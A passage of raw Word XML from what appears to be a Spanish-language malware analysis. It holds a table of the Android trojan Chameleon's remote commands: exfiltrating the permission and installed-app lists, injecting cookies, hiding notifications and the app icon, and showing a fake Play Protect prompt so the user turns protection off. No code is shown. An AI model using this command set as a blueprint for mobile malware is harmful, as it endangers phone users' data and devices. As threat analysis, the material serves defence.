        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6DB280" w14:textId="3EB22636" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Esconde el icono de la aplicación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE283E" w14:paraId="7F8CB02D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE6FC86" w14:textId="464C1598" w:rsidR="00EE283E" w:rsidRDefault="002D0C44">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>toast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17729F9C" w14:textId="08225459" w:rsidR="00EE283E" w:rsidRDefault="002D0C44">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Datos adicionales desconocidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2361F1F9" w14:textId="20A43E01" w:rsidR="00EE283E" w:rsidRDefault="002D0C44">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Crea una notificación tipo Toast [X] en el sistema </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3960" w14:paraId="4A8636C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF18BE4" w14:textId="0E73C6EA" w:rsidR="009B3960" w:rsidRDefault="009B3960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1392"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>openurl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6690A8D4" w14:textId="7C2ABB22" w:rsidR="009B3960" w:rsidRDefault="009B3960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>URL como parámetro adicional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A9C8B9" w14:textId="2459631C" w:rsidR="009B3960" w:rsidRDefault="009B3960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Abre la URL indicada en una nueva actividad de An</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>droid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="1EAE38C7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="075C6377" w14:textId="6D39A277" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E608972" w14:textId="32A9EB06" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5885C39D" w14:textId="4E36EB3D" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Sube el volumen del dispositivo al máximo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="493009AF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C821995" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761C20F7" w14:textId="3F2FE9C0" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3029A873" w14:textId="6C3B496F" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Reduce el volumen del dispositivo al mínimo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="5ECE5B6D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68CC0866" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="766B14B5" w14:textId="5C7D935D" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>extraOff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="050653ED" w14:textId="4F527474" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cambia el dispositivo a modo silencioso sin vibración</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="46D31168" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60975946" w14:textId="5E50A888" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2948C97E" w14:textId="4A63BA12" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6866B24D" w14:textId="44020D70" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Obtiene la lista de permisos que posee Chameleon y procede a exfiltrarla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="33E4BD55" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="195081A5" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="408A5881" w14:textId="47C6FD1D" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Comando adicional no indicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1672243C" w14:textId="109F7EE4" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Abre la pantalla de permisos de la aplicación que utiliza Chameleon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C96A88" w14:paraId="1573EBC8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D59A739" w14:textId="76F64218" w:rsidR="00C96A88" w:rsidRDefault="008C5123">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33710A14" w14:textId="792BB7BB" w:rsidR="00C96A88" w:rsidRDefault="008C5123">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>brightness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="129C68FA" w14:textId="5287E8F5" w:rsidR="00C96A88" w:rsidRDefault="008C5123">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Modifica el brillo de la pantalla en función de subcomandos adicionales (on/off)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="79175C4C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="269F59BC" w14:textId="501ED38D" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A424ABA" w14:textId="5A2B7C76" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">open </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C399BB5" w14:textId="35B3EBDD" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Abre la aplicación indicada en los subcomandos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="72E11EA8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="405F45D8" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22073A66" w14:textId="6732B0D3" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A58271C" w14:textId="357B9251" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Elimina la aplicación indicada y modifica el valor de auto_delete en las preferencias locales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0035666E" w14:paraId="4063588D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35496C1D" w14:textId="77777777" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC57664" w14:textId="28EBF669" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E5BBCB6" w14:textId="3864846B" w:rsidR="0035666E" w:rsidRDefault="0035666E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Exfiltra la información acerca de las aplicaciones instaladas en el dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A03B5" w14:paraId="170F904B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E552025" w14:textId="002DE987" w:rsidR="002A03B5" w:rsidRDefault="002A03B5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>inject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52BF220D" w14:textId="77777777" w:rsidR="002A03B5" w:rsidRDefault="002A03B5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098A3B3F" w14:textId="2FA4601A" w:rsidR="002A03B5" w:rsidRDefault="008D680B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Lleva a cabo inyección de cookies en las aplicaciones seleccionadas y bajo los parámetros indicados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="1AB12510" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB38A7E" w14:textId="32CD7F97" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>accessibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D4F6F0" w14:textId="5B9D863C" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>play_protect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09123613" w14:textId="2598056D" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Genera una ventana simulando el servicio PlayProtect para que esta sea desactiva</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>da por el usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="72F9849D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB6AB94" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E11F09" w14:textId="1E9AB785" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3770870B" w14:textId="6843C59F" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Esconde las notificaciones del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E64CF" w14:paraId="5BD84E24" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CB57AD" w14:textId="77777777" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DEF442A" w14:textId="1FCF53FE" w:rsidR="000E64CF" w:rsidRDefault="000E64CF">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>gps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3001" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
